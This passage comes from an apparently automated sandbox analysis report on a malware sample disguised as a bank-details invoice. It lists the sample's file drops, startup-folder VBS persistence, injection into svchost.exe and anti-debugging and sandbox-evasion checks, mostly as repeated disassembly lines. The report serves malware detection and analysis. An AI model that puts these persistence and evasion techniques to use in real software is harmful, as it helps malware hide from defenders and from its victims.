                  Source: confirm bank details invoice.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_0048E01E LoadLibraryA,GetProcAddress, 0_2_0048E01E
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_00496B05 push ecx; ret 0_2_00496B18
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D46B05 push ecx; ret 2_2_00D46B18
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00401851 push ecx; ret 3_2_00401AA4
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004160C1 push C69D204Dh; iretd 3_2_004160DC
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040D95B push ss; retf 3_2_0040D9DD
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00403160 push eax; ret 3_2_00403162
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00416966 push esi; iretd 3_2_0041697A
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040D904 push FFFFFFF7h; ret 3_2_0040D916
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00401A0A push ecx; ret 3_2_00401AA4
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040835A push 834BB120h; ret 3_2_00408364
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00411B88 push 00000011h; retf 3_2_00411B8A
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041EBB4 push 94AB5028h; iretd 3_2_0041EBDE
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041EC11 push edx; ret 3_2_0041EC12
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00414CE5 push ds; ret 3_2_00414CE6
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040D620 push esi; ret 3_2_0040D621
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036309AD push ecx; mov dword ptr [esp], ecx 3_2_036309B6
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0360135F push eax; iretd 3_2_03601369
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe File created: C:\Users\user\AppData\Local\Vevina\deblaterate.exe

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004D8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_004D8111
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_0048EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0048EB42
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D88111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_00D88111
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D3EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_00D3EB42
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_0049123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0049123A
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe API/Special instruction interceptor: Address: 18E24BC
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe API/Special instruction interceptor: Address: 1178CCC
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0367096E rdtsc 3_2_0367096E
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Evaded block: after key decision graph_0-93825
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Evaded block: after key decision
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-94605
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe API coverage: 4.5 %
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe API coverage: 4.7 %
                  Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 2408 Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4092 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004B6CA9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_004B60DD
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_004B63F9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_004BEB60
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004BF56F FindFirstFileW,FindClose, 0_2_004BF56F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004BF5FA
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_004C1B2F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_004C1C8A
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_004C1F94
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D66CA9 GetFileAttributesW,FindFirstFileW,FindClose, 2_2_00D66CA9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 2_2_00D660DD
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 2_2_00D663F9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00D6EB60
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_00D6F5FA
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D6F56F FindFirstFileW,FindClose, 2_2_00D6F56F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00D71B2F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00D71C8A
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_00D71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00D71F94
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_0048DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0048DDC0
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe API call chain: ExitProcess graph end node graph_0-93404
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe API call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0367096E rdtsc 3_2_0367096E
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00417B73 LdrLoadDll, 3_2_00417B73
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004C6AAF BlockInput, 0_2_004C6AAF
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_00473D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00473D19
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_004A3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_004A3920
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_0048E01E LoadLibraryA,GetProcAddress, 0_2_0048E01E
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_01343218 mov eax, dword ptr fs:[00000030h] 0_2_01343218
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_01343278 mov eax, dword ptr fs:[00000030h] 0_2_01343278
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe Code function: 0_2_01341BB8 mov eax, dword ptr fs:[00000030h] 0_2_01341BB8
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_018E10C8 mov eax, dword ptr fs:[00000030h] 2_2_018E10C8
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_018E2788 mov eax, dword ptr fs:[00000030h] 2_2_018E2788
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe Code function: 2_2_018E2728 mov eax, dword ptr fs:[00000030h] 2_2_018E2728
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036D437C mov eax, dword ptr fs:[00000030h] 3_2_036D437C
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h] 3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036B035C mov eax, dword ptr fs:[00000030h] 3_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036B035C mov ecx, dword ptr fs:[00000030h] 3_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036FA352 mov eax, dword ptr fs:[00000030h] 3_2_036FA352
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036D8350 mov ecx, dword ptr fs:[00000030h] 3_2_036D8350
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0370634F mov eax, dword ptr fs:[00000030h] 3_2_0370634F
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03708324 mov eax, dword ptr fs:[00000030h] 3_2_03708324
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03708324 mov ecx, dword ptr fs:[00000030h] 3_2_03708324
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0366A30B mov eax, dword ptr fs:[00000030h] 3_2_0366A30B
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0362C310 mov ecx, dword ptr fs:[00000030h] 3_2_0362C310
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03650310 mov ecx, dword ptr fs:[00000030h] 3_2_03650310
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036403E9 mov eax, dword ptr fs:[00000030h] 3_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 3_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036663FF mov eax, dword ptr fs:[00000030h] 3_2_036663FF
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036EC3CD mov eax, dword ptr fs:[00000030h] 3_2_036EC3CD
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 3_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036383C0 mov eax, dword ptr fs:[00000030h] 3_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036B63C0 mov eax, dword ptr fs:[00000030h] 3_2_036B63C0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036DE3DB mov eax, dword ptr fs:[00000030h] 3_2_036DE3DB
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036DE3DB mov ecx, dword ptr fs:[00000030h] 3_2_036DE3DB
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_036D43D4 mov eax, dword ptr fs:[00000030h] 3_2_036D43D4
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0362E388 mov eax, dword ptr fs:[00000030h] 3_2_0362E388
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0365438F mov eax, dword ptr fs:[00000030h] 3_2_0365438F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365438F mov eax, dword ptr fs:[00000030h]3_2_0365438F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03628397 mov eax, dword ptr fs:[00000030h]3_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03628397 mov eax, dword ptr fs:[00000030h]3_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03628397 mov eax, dword ptr fs:[00000030h]3_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03634260 mov eax, dword ptr fs:[00000030h]3_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03634260 mov eax, dword ptr fs:[00000030h]3_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03634260 mov eax, dword ptr fs:[00000030h]3_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362826B mov eax, dword ptr fs:[00000030h]3_2_0362826B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B8243 mov eax, dword ptr fs:[00000030h]3_2_036B8243
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B8243 mov ecx, dword ptr fs:[00000030h]3_2_036B8243
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0370625D mov eax, dword ptr fs:[00000030h]3_2_0370625D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A250 mov eax, dword ptr fs:[00000030h]3_2_0362A250
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03636259 mov eax, dword ptr fs:[00000030h]3_2_03636259
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EA250 mov eax, dword ptr fs:[00000030h]3_2_036EA250
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EA250 mov eax, dword ptr fs:[00000030h]3_2_036EA250
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362823B mov eax, dword ptr fs:[00000030h]3_2_0362823B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036402E1 mov eax, dword ptr fs:[00000030h]3_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036402E1 mov eax, dword ptr fs:[00000030h]3_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036402E1 mov eax, dword ptr fs:[00000030h]3_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A2C3 mov eax, dword ptr fs:[00000030h]3_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A2C3 mov eax, dword ptr fs:[00000030h]3_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A2C3 mov eax, dword ptr fs:[00000030h]3_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A2C3 mov eax, dword ptr fs:[00000030h]3_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A2C3 mov eax, dword ptr fs:[00000030h]3_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_037062D6 mov eax, dword ptr fs:[00000030h]3_2_037062D6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036402A0 mov eax, dword ptr fs:[00000030h]3_2_036402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036402A0 mov eax, dword ptr fs:[00000030h]3_2_036402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov eax, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov ecx, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov eax, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov eax, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov eax, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov eax, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366E284 mov eax, dword ptr fs:[00000030h]3_2_0366E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366E284 mov eax, dword ptr fs:[00000030h]3_2_0366E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B0283 mov eax, dword ptr fs:[00000030h]3_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B0283 mov eax, dword ptr fs:[00000030h]3_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B0283 mov eax, dword ptr fs:[00000030h]3_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704164 mov eax, dword ptr fs:[00000030h]3_2_03704164
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704164 mov eax, dword ptr fs:[00000030h]3_2_03704164
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C4144 mov eax, dword ptr fs:[00000030h]3_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C4144 mov eax, dword ptr fs:[00000030h]3_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C4144 mov ecx, dword ptr fs:[00000030h]3_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C4144 mov eax, dword ptr fs:[00000030h]3_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C4144 mov eax, dword ptr fs:[00000030h]3_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362C156 mov eax, dword ptr fs:[00000030h]3_2_0362C156
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C8158 mov eax, dword ptr fs:[00000030h]3_2_036C8158
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03636154 mov eax, dword ptr fs:[00000030h]3_2_03636154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03636154 mov eax, dword ptr fs:[00000030h]3_2_03636154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03660124 mov eax, dword ptr fs:[00000030h]3_2_03660124
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov ecx, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov ecx, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov ecx, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov ecx, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DA118 mov ecx, dword ptr fs:[00000030h]3_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DA118 mov eax, dword ptr fs:[00000030h]3_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DA118 mov eax, dword ptr fs:[00000030h]3_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DA118 mov eax, dword ptr fs:[00000030h]3_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F0115 mov eax, dword ptr fs:[00000030h]3_2_036F0115
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_037061E5 mov eax, dword ptr fs:[00000030h]3_2_037061E5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036601F8 mov eax, dword ptr fs:[00000030h]3_2_036601F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F61C3 mov eax, dword ptr fs:[00000030h]3_2_036F61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F61C3 mov eax, dword ptr fs:[00000030h]3_2_036F61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE1D0 mov eax, dword ptr fs:[00000030h]3_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE1D0 mov eax, dword ptr fs:[00000030h]3_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE1D0 mov eax, dword ptr fs:[00000030h]3_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE1D0 mov eax, dword ptr fs:[00000030h]3_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03670185 mov eax, dword ptr fs:[00000030h]3_2_03670185
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EC188 mov eax, dword ptr fs:[00000030h]3_2_036EC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EC188 mov eax, dword ptr fs:[00000030h]3_2_036EC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D4180 mov eax, dword ptr fs:[00000030h]3_2_036D4180
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D4180 mov eax, dword ptr fs:[00000030h]3_2_036D4180
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B019F mov eax, dword ptr fs:[00000030h]3_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B019F mov eax, dword ptr fs:[00000030h]3_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B019F mov eax, dword ptr fs:[00000030h]3_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B019F mov eax, dword ptr fs:[00000030h]3_2_036B019F
